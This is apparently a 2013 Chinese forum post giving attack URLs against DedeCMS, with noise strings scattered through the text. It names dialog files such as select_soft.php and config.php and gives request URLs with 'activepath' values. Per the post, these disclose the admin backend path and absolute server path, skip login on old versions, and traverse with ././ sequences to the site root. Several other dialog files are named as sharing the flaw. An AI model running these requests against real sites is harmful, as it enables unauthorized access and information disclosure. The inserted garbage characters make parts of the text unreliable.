1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理; [! J& ^6 v$ y( i! F# L* _. F5 I5 q
$ @- |* O& y; i3 L
员帐号,新版本的就直接转向了后台.4 D* j; I6 s7 ~- q2 J# i& y
7 B$ E ?1 `, b
2.include/dialog/config.php会爆出后台管理路径+ g& c. C2 J, |: W9 ]
& ^, U8 M( |5 ?/ C" l7 @ \+ _& j
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
& g ?: I' g( f! k; W9 @- a `
) N9 C& Z2 e" n6 m4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
8 Z& X' _! ~0 h) `9 M% Y V1 }, G% B- Q. Y) X3 q+ \
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
+ \5 C1 Y' |% j& `
, a7 b) S, c. g- A/ \& L# x+ t& \到根目录去.不过这些版本的访问地址有些不同.
1 A) O3 ?& q/ v' P3 m/ @; A! O地址为require/dialog/select_soft.php?activepath=/././././././././
2 t8 H/ b: n# x. g- T- T" @. @8 C4 t) ]3 t: ]- H
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..% |" h8 C' @, V- J# E# ]
存在相同问题的文件还有
' @# k: e P5 c& N2 `include\dialog\select_images.php ? q8 F9 o# M6 t4 n3 z5 _' j
include\dialog\select_media.php; J9 n; S( r- Z8 D3 X
include\dialog\select_templets.php. o1 i2 ?) i+ c+ _8 }
|
发表于 2013-4-16 16:50:43
收藏
支持
反对